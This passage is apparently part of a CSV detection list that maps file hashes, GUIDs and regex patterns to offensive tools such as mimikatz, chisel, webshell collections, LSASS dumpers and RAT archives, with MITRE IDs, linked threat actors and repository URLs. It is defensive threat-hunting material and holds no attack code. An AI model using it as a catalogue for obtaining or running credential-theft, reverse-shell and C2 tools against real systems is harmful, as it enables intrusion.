"*46ae3c70f1c7fb28a292eb50e6845b5ebdcdd811b02ec53e8c3007c12d326a8f*",".{0,1000}46ae3c70f1c7fb28a292eb50e6845b5ebdcdd811b02ec53e8c3007c12d326a8f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25804" "*46aee0547844dab640a8f982d4fb71207da42c0e00e214f2012680d3822adb85*",".{0,1000}46aee0547844dab640a8f982d4fb71207da42c0e00e214f2012680d3822adb85.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","25805" "*46af05c6fd5f190ff57c562622d7345f016059e6d8399d3401ded79d61d54089*",".{0,1000}46af05c6fd5f190ff57c562622d7345f016059e6d8399d3401ded79d61d54089.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","25806" "*46af7c0674c69df2af1905ea58288f24d2d10e644d5446d8d2b71b251e8e70bd*",".{0,1000}46af7c0674c69df2af1905ea58288f24d2d10e644d5446d8d2b71b251e8e70bd.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation 
TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","25807" "*46ba3075010ce026f20aad133b871d4fec53b6d2972f736ee1a98a8d1bfb7ff9*",".{0,1000}46ba3075010ce026f20aad133b871d4fec53b6d2972f736ee1a98a8d1bfb7ff9.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","25809" "*46ba6286810d79be37facbd8c315a35acc1d49dc012870a50014eaff1bcd1fbd*",".{0,1000}46ba6286810d79be37facbd8c315a35acc1d49dc012870a50014eaff1bcd1fbd.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","25810" "*46c816bb93ab1d318a84b7295969a7b9d2b8a728f5a6af52126119cc74d26d0a*",".{0,1000}46c816bb93ab1d318a84b7295969a7b9d2b8a728f5a6af52126119cc74d26d0a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25812" "*46c81a0250992cc04c2ee1ce3253fd4629e6ae25da1cecdbfe0427b5aa3157c4*",".{0,1000}46c81a0250992cc04c2ee1ce3253fd4629e6ae25da1cecdbfe0427b5aa3157c4.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","#filehash","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","25813" "*46d1f15077f064a99b06bb115ba498581828ff8b712b2c41f6eb602538077035*",".{0,1000}46d1f15077f064a99b06bb115ba498581828ff8b712b2c41f6eb602538077035.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","0","#filehash","N/A","10","4","349","67","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z","25815" "*46D3E566-0EBA-4BD9-925E-84F4CB9EE7BC*",".{0,1000}46D3E566\-0EBA\-4BD9\-925E\-84F4CB9EE7BC.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential 
Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","#GUIDproject","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","25817" "*46db2ff1d405f57e52377c5e42b9918d7b00c47ea75a5a77352dacd1d8d0c97a*",".{0,1000}46db2ff1d405f57e52377c5e42b9918d7b00c47ea75a5a77352dacd1d8d0c97a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25821" "*46e7e0cd3eae7fa11350683e8d75c44e575d590aba9574eba619ccec699b3d30*",".{0,1000}46e7e0cd3eae7fa11350683e8d75c44e575d590aba9574eba619ccec699b3d30.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25823" "*46EB7B83-3404-4DFC-94CC-704B02D11464*",".{0,1000}46EB7B83\-3404\-4DFC\-94CC\-704B02D11464.{0,1000}","offensive_tool_keyword","DirtyCLR","An App Domain Manager Injection DLL PoC","T1055.001 - T1546.016 - T1055.013","TA0005 - TA0004","N/A","Black Basta","Privilege Escalation","https://github.com/ipSlav/DirtyCLR","1","0","#GUIDproject","N/A","7","2","170","19","2023-12-14T21:22:12Z","2023-12-11T11:29:36Z","25824" "*46f1f34d38963f9ee2e81449356b0f39475ea1f31395edfa097e08ce975b4748*",".{0,1000}46f1f34d38963f9ee2e81449356b0f39475ea1f31395edfa097e08ce975b4748.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - 
TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","25825" "*46f31a5656b5592c4b37514bf7726bb1d51140b7eab918643a931cd269289b19*",".{0,1000}46f31a5656b5592c4b37514bf7726bb1d51140b7eab918643a931cd269289b19.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","25826" "*46f917a6a3de5d2b29fd77a842015ac27e6e3ba2faa92395c27666b2721dcaa0*",".{0,1000}46f917a6a3de5d2b29fd77a842015ac27e6e3ba2faa92395c27666b2721dcaa0.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","25827" "*46fd93a2992e8e9a29740d3d116d6d802315e51753f667cd3e462845ddea663c*",".{0,1000}46fd93a2992e8e9a29740d3d116d6d802315e51753f667cd3e462845ddea663c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25828" 
"*470150f91aebe1fd59949728f99b2bb847cf8d1867ca2ee767fef9b7c44e206d*",".{0,1000}470150f91aebe1fd59949728f99b2bb847cf8d1867ca2ee767fef9b7c44e206d.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","25829" "*47042a24b908274eec6f075245339e4f6058834220e3c2469e235c881d8aa5eb*",".{0,1000}47042a24b908274eec6f075245339e4f6058834220e3c2469e235c881d8aa5eb.{0,1000}","offensive_tool_keyword","mimipy","Tool to dump passwords from various processes memory","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/n1nj4sec/mimipy","1","0","#filehash","N/A","10","3","207","36","2017-04-30T00:09:15Z","2017-04-05T21:06:32Z","25830" "*4709b94c38800c9a400aeee54241b107b8fd597f34e3283949a18537f2ae04a7*",".{0,1000}4709b94c38800c9a400aeee54241b107b8fd597f34e3283949a18537f2ae04a7.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/cube0x0/CVE-2021-1675","1","0","#filehash","N/A","10","10","1879","582","2021-07-20T15:28:13Z","2021-06-29T17:24:14Z","25832" "*47164ef76a78406a70ee1b88ae4e31230ace7ee2ba6c3a56b0b9771b75e14fff*",".{0,1000}47164ef76a78406a70ee1b88ae4e31230ace7ee2ba6c3a56b0b9771b75e14fff.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25833" "*471f844b5ea9583d0f2f4ad2adf9dfd91b407d54f8e984bd901c19a39d1dd1d7*",".{0,1000}471f844b5ea9583d0f2f4ad2adf9dfd91b407d54f8e984bd901c19a39d1dd1d7.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","25834" "*471ff2b50c255470e1ed51c9e712abfb95d36803c1c1e186f9048e5118a1a62b*",".{0,1000}471ff2b50c255470e1ed51c9e712abfb95d36803c1c1e186f9048e5118a1a62b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25835" 
"*47266@AIRMAIL.CC*",".{0,1000}47266\@AIRMAIL\.CC.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","25837" "*472ff356009e3d68bdf619c87f27fd79f791f0245c78b553e6726e59817511c5*",".{0,1000}472ff356009e3d68bdf619c87f27fd79f791f0245c78b553e6726e59817511c5.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25838" "*4747b86b7a8d2ba61f377e2526d6f2764cb8146be5dd8d6ad42af745dd705c8b*",".{0,1000}4747b86b7a8d2ba61f377e2526d6f2764cb8146be5dd8d6ad42af745dd705c8b.{0,1000}","offensive_tool_keyword","pwdump","a tool used within a command-line interface on 64bit Windows computers to extract the NTLM (LanMan) hashes from LSASS.exe in memory. 
This tool may be used in conjunction with malware or other penetration testing tools to obtain credentials for use in Windows authentication systems","T1003 - T1110.001 - T1555.003 - T1003.002","TA0006","N/A","menuPass - APT41 - Threat Group-3390 - APT1 - Turla - APT39 - FIN5","Credential Access","https://ftp.samba.org/pub/samba/pwdump/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","25840" "*474B99B7-66C4-4AC2-8AD3-065DD13DDDFF*",".{0,1000}474B99B7\-66C4\-4AC2\-8AD3\-065DD13DDDFF.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","#GUIDproject","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z","25842" "*4755e1f4336849953c87bbc5f4d63698eb44d6a3b2533e591ee7cd07a16a9937*",".{0,1000}4755e1f4336849953c87bbc5f4d63698eb44d6a3b2533e591ee7cd07a16a9937.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","25844" "*475aaa5c274e43b4717906180e531d3562bc154b2de723a6b37d30c87e647467*",".{0,1000}475aaa5c274e43b4717906180e531d3562bc154b2de723a6b37d30c87e647467.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","25845" "*475e1063cd3404621f051db1a5f3c9aaf939433f5996bf97388c90f3bc5f9fd2*",".{0,1000}475e1063cd3404621f051db1a5f3c9aaf939433f5996bf97388c90f3bc5f9fd2.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","25846" "*4762afbed760fd74821549b9f03467e32cb4ce26e0a244da011ef447aa0b9234*",".{0,1000}4762afbed760fd74821549b9f03467e32cb4ce26e0a244da011ef447aa0b9234.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","25848" "*4768435dcfd9ec06377e5b83489898683c97b1a44ec11ef452c640c82b48bfe1*",".{0,1000}4768435dcfd9ec06377e5b83489898683c97b1a44ec11ef452c640c82b48bfe1.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25849" 
"*476FC126-239F-4D58-8389-E1C0E93C2C5E*",".{0,1000}476FC126\-239F\-4D58\-8389\-E1C0E93C2C5E.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","#GUIDproject","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","25850" "*4773112ed8b41ef5fc0ad7b59134be3e5204b726154d1e97553e16f85fa2a045*",".{0,1000}4773112ed8b41ef5fc0ad7b59134be3e5204b726154d1e97553e16f85fa2a045.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","25851" "*47747e172be46f80fb7817cb3f0069f5354883d733f98f63ba3dc1849d1c69a2*",".{0,1000}47747e172be46f80fb7817cb3f0069f5354883d733f98f63ba3dc1849d1c69a2.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","25854" "*4775208998622726a1b1a5f156e6e88b2ba4e568416795c19358d7380c35b0b8*",".{0,1000}4775208998622726a1b1a5f156e6e88b2ba4e568416795c19358d7380c35b0b8.{0,1000}","offensive_tool_keyword","SharpBruteForceSSH","simple SSH brute force tool ","T1110.003 - T1078","TA0006 
","N/A","N/A","Credential Access","https://github.com/HernanRodriguez1/SharpBruteForceSSH","1","0","#filehash","N/A","9","1","60","10","2024-04-28T17:56:33Z","2024-04-25T20:06:05Z","25855" "*47754449ae1a74f008d1a322a1b66110af723cf08bc9b866723f58473d02e444*",".{0,1000}47754449ae1a74f008d1a322a1b66110af723cf08bc9b866723f58473d02e444.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25856" "*4777595decaa624e3a5c966272392cb58a20add5e7ab25d7a3d89e923a6905a1*",".{0,1000}4777595decaa624e3a5c966272392cb58a20add5e7ab25d7a3d89e923a6905a1.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25857" "*4781b10d0dae27a772518c9167b3a654c46017897bc73ce4540f4bfca33e9b58*",".{0,1000}4781b10d0dae27a772518c9167b3a654c46017897bc73ce4540f4bfca33e9b58.{0,1000}","offensive_tool_keyword","NLBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/amazond/NLBrute-1.2","1","0","#filehash","N/A","10","1","1","2","2023-12-21T12:25:54Z","2023-12-21T12:22:27Z","25858" "*47849ce5bce4642bcd3811063e45984219ce4b6b006847acfdc88b1186313420*",".{0,1000}47849ce5bce4642bcd3811063e45984219ce4b6b006847acfdc88b1186313420.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","25860" "*478b63e32ecfb5302ba2e6da13a8c16055ad0885c3f65b90f52e6c23240a35a1*",".{0,1000}478b63e32ecfb5302ba2e6da13a8c16055ad0885c3f65b90f52e6c23240a35a1.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","25861" "*478e0f90d2d51a17f5ffce9dda75339848ef2bd5b8109b6695104a9ae8b71bc1*",".{0,1000}478e0f90d2d51a17f5ffce9dda75339848ef2bd5b8109b6695104a9ae8b71bc1.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - 
Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","https://www.virustotal.com/gui/file-analysis/ZTNjYTA2MmQ2YzhiYWUwMjc4Y2U5YmIwNmVhMDVkNDA6MTcyNDUyNTI4Ng==","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","25862" "*47a09946abb82f902d44af7c47877cb53e146d37d3701ae6b1afec149737311a*",".{0,1000}47a09946abb82f902d44af7c47877cb53e146d37d3701ae6b1afec149737311a.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25865" "*47a825e8e986071566b2bd72e956bc88f422348ebe17b4e142e7c6a1a1eb4a1f*",".{0,1000}47a825e8e986071566b2bd72e956bc88f422348ebe17b4e142e7c6a1a1eb4a1f.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","25868" "*47ab74088173b85e9b5aee8a8597ada4ebd3ef4bbe645ecc45a52392be9b94b6*",".{0,1000}47ab74088173b85e9b5aee8a8597ada4ebd3ef4bbe645ecc45a52392be9b94b6.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","25869" "*47ab8ed046a22fb188930af037aa05a7f74e3e39331d56c32d736589f7ac78b2*",".{0,1000}47ab8ed046a22fb188930af037aa05a7f74e3e39331d56c32d736589f7ac78b2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25871" "*47adbdef1e6009d49324930f31963210ebaf0f9a3e8cb293f027d81c1aedc309*",".{0,1000}47adbdef1e6009d49324930f31963210ebaf0f9a3e8cb293f027d81c1aedc309.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","25872" "*47c92847c6341aa56ef4979a795844c089a6e87696eeebab2d0411e03b51d79b*",".{0,1000}47c92847c6341aa56ef4979a795844c089a6e87696eeebab2d0411e03b51d79b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - 
